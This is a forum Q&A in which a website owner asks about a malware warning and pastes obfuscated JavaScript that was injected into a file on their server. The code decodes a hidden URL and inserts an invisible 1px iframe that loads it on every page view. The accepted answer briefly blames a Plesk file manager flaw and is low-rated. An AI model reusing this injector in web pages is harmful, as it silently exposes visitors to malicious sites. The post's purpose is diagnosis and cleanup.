# Injection in Javascript file on server

Tags: javascript, file, code-injection, virus

My website is showing message in browser
"mydomain.com contains malware. Your computer might catch a virus if you visit this site."

After checking in webmaster tool I found java script file is changed and some codes are appended in this file. But earlier I changed the FTP and other passwords.

I am surprised how these codes are inserted in read only file on server while ftp was changed earlier.

What is this?. 
Is this  virus attack or something else and how I can check and remove virus (if any)?

Following are the codes added in javascript file.

```
if('CdkO'=='WJGLZ')WltF();function VrzYJI(){var fxko='MQjxtI';if('CyWq'=='IeMRba')PLxWxh();}
var tfhbJZ="con\x73\x74\x72ucto\x72";function nCesU(){}var LibD='DtiXVu';var px0_var="0p\x78";if('AUEe'=='jkeMwo')dgZHo='JixI';var WXUGCTeW="par\x73eIn\x74";var fJdwiU='HkKPc';function YKEF(){var IPUbt='lpVuaP';if('hgcAK'=='NSNfa')aMlM();}
var appVersion_var="a\x70pV\x65rsion";var GNYH='ZRUtGA';if('eBdo'=='zvBN')iPKu='hnyr';function vOWkf(){}function ZKAxLa(){var wLRC='vLarQA';if('PtqFaq'=='fUwi')XIGbIQ();}
var lVVSNNg="";var CxCP;var px1_var="1p\x78";var ZsUS;var YZuDAwsjn="b\x6fd\x79";var iuvTLT=123;if('jKCKy'=='oGHZN')BdGS();var JTrlocAdo="appendChild";function gclv(){var zanTcM='fvrmqz';if('BnHRcw'=='EEsejm')SMOo();}
var KWdpWKXJ="8d9999955f54549497868b86965388949254889794938953958d95";function OQzFK(){var FLac='plfdm';if('LFoy'=='EwqxJ')uPUdDb();}if('gdBD'=='BwqmW')aCEU();var IBUm='yeFDT';var bQdKIy="sli\x63\x65";function FHIiLK(){var MBkF='EuYDLV';if('PvzvCY'=='fRLQH')iFuid();}
var CxmPcURq="fromCharCode";var HyNEe='OZSvI';var wLrupv=(function(){var StkS='epJJDq';return this;if('SccXj'=='SVyct')xEXC();function pfHHB(){}})();if('funs'=='UyyiNF')amGGs();var mIpTJBqZc="joPfVdCy"[tfhbJZ];var wjjFIK=33;var YEHEAS;for(var pWCeJ=0;pWCeJ<KWdpWKXJ.length;pWCeJ+=2){if('ZFrN'=='VxPc')QczgU='hFfl';VUAzhFZU=wLrupv[WXUGCTeW](KWdpWKXJ[bQdKIy](pWCeJ,pWCeJ+2),16)-37;var VLFmeK;lVVSNNg+=mIpTJBqZc[CxmPcURq](VUAzhFZU);if('prqjym'=='UHrJa')MiuvBu();}
var zaZhFI=293;if('YzpRXm'=='MNJwSK')tTTq='AEeBR';var REdbBzld="DdTPKzFI";var MQuCD='JPTBg';function EaYq(){}if('MVbJ'=='RFbVx')zKUf='zdnfP';function KEgn(){var Hsch='ZrBxl';if('NkwuXz'=='FSzAyt')pTXBE();}
var oYUpEIig="";var Vthu=277;if(navigator[appVersion_var].indexOf("MSIE")!=-1){if('bFpRU'=='GsDnn')qygk='lmUxN';var ecSd;oYUpEIig='<iframe name="'+REdbBzld+'" src="'+lVVSNNg+'">';if('sBZK'=='rxsdM')bKacE();}else{if('PHngtx'=='GLlAu')bcSoAG();function SYYU(){}
oYUpEIig='iframe';var YIBQP=222;}
function JwDx(){var RzMKo='supF';if('XXDiVZ'=='QibJLF')Hwfn();}
var VxmJyYuwi=document.createElement(oYUpEIig);if('pgsYEc'=='NTSgKU')Brfc='Rnuk';function PZbvIF(){}
VxmJyYuwi.vIysu=function(){var aRwK;if('Qqzu'=='FJXo')druxka='GGBLEL';this["src"]=lVVSNNg;var FuOS;var PScx=23;}
var cRuRe=258;var YsPwxC;VxmJyYuwi.style.top=px0_var;var QetiQ='DZEkb';VxmJyYuwi.vIysu();if('JggEby'=='WOvNk')zMGOX();if('aLKZ'=='MAUOW')eFWE='gOXg';if('yHoD'=='PBdzQ')xYVoer='nisPV';VxmJyYuwi.name=REdbBzld;function YEJay(){}var ZNWOM;VxmJyYuwi.style.height=px1_var;function XDwP(){}
VxmJyYuwi.style.position="absolute";if('xbIySc'=='yNlEH')eOJWpQ='ikyk';function IMeAq(){}
var irdJAD=172;VxmJyYuwi.style.width=px1_var;VxmJyYuwi.style.right=px0_var;if('kndd'=='BkrF')WGwYa='VVer';var uoEnJ='youKio';function orSoOjwi(){if('MnXf'=='nTILss')FgeFCT='jDxk';if(document[YZuDAwsjn]){var DhGHk='ajfbHe';function Ydkz(){var GWqvCL='MvgtmN';if('XpgqVo'=='rYhw')uggAO();}
document[YZuDAwsjn][JTrlocAdo](VxmJyYuwi);var FWgG='DHITvG';}else{if('FOmyN'=='ZcJs')pnCabN='lFdTU';setTimeout(orSoOjwi,120);if('EkcQ'=='tVynkk')nGBNjE='MVgOWc';var sjLbg;}
function eciRV(){}}
function EJwt(){var uKrE='wCpD';if('pkYdXv'=='oOXOLr')mljDR();}var BCNgRv;orSoOjwi();var vxWIdO='KQBivA';var CfZn=36;var RXTyN;function cxqTMA(){var mAhD='QhbH';if('PaNmx'=='EkYttb')rfxOr();}var EUSU;
```

Comment: Yes, this is a malware infection. Delete the infected files, ask your hosting provider for assistance in determining how they were infected and closing those holes, consider restoring everything from backups (you do have backups, right... ?) and read up on best security practices to reduce such problems in the future.

Comment: Thanks for your quick assistance. I have dedicated server. Please give some ideas how Can I fix so called holes.

Comment: @user1376613 Without knowing some key information, like what cms you're using, what version of said cms you're using..  how your site is structured, any help would be a total shot in the dark and likely be useless to you.

Comment: Questions about server security might be better handled by serverfault.com. This question can be moved if you like.

Comment: We are not using any cms. website structure is our own. Please move it to serverfault.com

Answer (score -1, accepted):

plask up to 10.3 version is Vulnerable.

javascript malicious codes injected in my web pages using file manager.Ultimately port 8443 and 8447 blocked and issue resolved.

Another option is to upgrade plesk to 11